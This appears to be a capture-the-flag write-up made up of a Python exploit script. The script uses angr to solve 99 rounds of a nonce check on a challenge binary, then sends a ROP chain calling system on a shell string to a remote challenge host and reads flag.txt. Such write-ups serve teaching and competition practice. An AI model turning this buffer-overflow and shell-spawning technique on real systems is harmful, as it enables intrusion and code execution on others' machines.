Tags: pwn angr rop 

Rating:

```python
import angr
import claripy
import sys
from pwn import *

# Quiet the chatty libraries so only this script's own info()/warn() lines show.
for logger_name in ('angr', 'os', 'pwnlib'):
    logging.getLogger(logger_name).setLevel(logging.WARNING)

# The target binary is taken from the pwntools command line (BIN=<path>).
binary = args.BIN
context.terminal = ["tmux", "splitw", "-h"]
e = ELF(binary)
context.binary = e
r = ROP(e)

# gdb script used when GDB=1: no breakpoints, just let the process run.
gs = '''
continue
'''

def start():
    """Return a pwntools tube for the target, selected by command-line flags.

    GDB=1 runs the binary under gdb with the script in ``gs``; REMOTE=1
    connects to the challenge host; otherwise the binary is run locally.
    The flags are checked in that order, so GDB wins over REMOTE.
    """
    if args.GDB:
        return gdb.debug(e.path, gdbscript=gs)
    if args.REMOTE:
        return remote('0.cloud.chals.io', 14011)
    return process(e.path)

p = start()  # the tube every recv/send below goes through; opened once, up front

def solve(t):
    """Answer round *t* of the service's nonce check.

    Reads the two nonces the service prints, then symbolically executes the
    routine at ``start_address`` with angr to find a 64-bit value for the
    fourth register argument that makes the program print ``Correct.``
    instead of ``Incorrect.``.  The value is sent back over ``p`` and the
    function waits for the ``Continuing`` prompt before returning.

    Args:
        t: the round counter; it is loaded into rdx unchanged.

    Raises:
        Exception: if the exploration finds no state that prints ``Correct.``.
    """
    p.recvuntil(b'Nonce 1:')
    nonce1 = int(p.recvline())
    info('Nonce 1: %i' % nonce1)
    p.recvuntil(b'Nonce 2:')
    nonce2 = int(p.recvline())
    info('Nonce 2: %i' % nonce2)

    project = angr.Project(binary)
    start_address = 0x40155e
    state = project.factory.blank_state(
        addr=start_address,
        add_options={
            angr.options.SYMBOL_FILL_UNCONSTRAINED_MEMORY,
            angr.options.SYMBOL_FILL_UNCONSTRAINED_REGISTERS,
        },
    )

    # The answer is an unconstrained 64-bit bit-vector; the two nonces and the
    # round counter are concrete.  Presumably these are the routine's four
    # integer arguments in SysV x86-64 order -- verify against the disassembly.
    answer = claripy.BVS('', 64)
    state.regs.rdi = nonce1
    state.regs.rsi = nonce2
    state.regs.rdx = t
    state.regs.rcx = answer

    # Host stdout's descriptor number is used as the simulated program's
    # stdout fd when reading what a state has printed so far.
    stdout_fd = sys.stdout.fileno()

    def printed(s, needle):
        return needle in s.posix.dumps(stdout_fd)

    simgr = project.factory.simgr(state)
    simgr.explore(
        find=lambda s: printed(s, b'Correct.'),
        avoid=lambda s: printed(s, b'Incorrect.'),
    )

    if not simgr.found:
        raise Exception('Could not find the solution')

    solution = simgr.found[0].solver.eval(answer)
    info("Found solution: %i" % solution)
    p.sendline(b'%i' % solution)
    warn('Sent solution: %i for iteration: %i' % (solution, t))
    p.recvuntil(b'Continuing')

# Clear rounds 1..99 of the nonce check; the round number is the counter
# solve() loads into rdx.
for round_no in range(1, 100):
    solve(round_no)

p.recvuntil(b'Throw Your Exploit')
print("Throwing Exploit")

# Addresses are resolved from the ELF itself, so they depend on the local
# copy of the binary matching the one the service runs.
pop_rdi = p64(r.find_gadget(['pop rdi', 'ret'])[0])
bin_sh = p64(e.sym['shell'])
system = p64(e.sym['system'])

# 16 bytes of filler followed by the three 8-byte values, in that order.
pad = cyclic(16)
chain = b''.join([pop_rdi, bin_sh, system])

p.sendline(pad + chain)

p.sendline(b'cat flag.txt')
p.interactive()
```

Original writeup (https://github.com/tj-oconnor/cyber-open-2022/blob/main/pwn/problems/pwn-problems.py).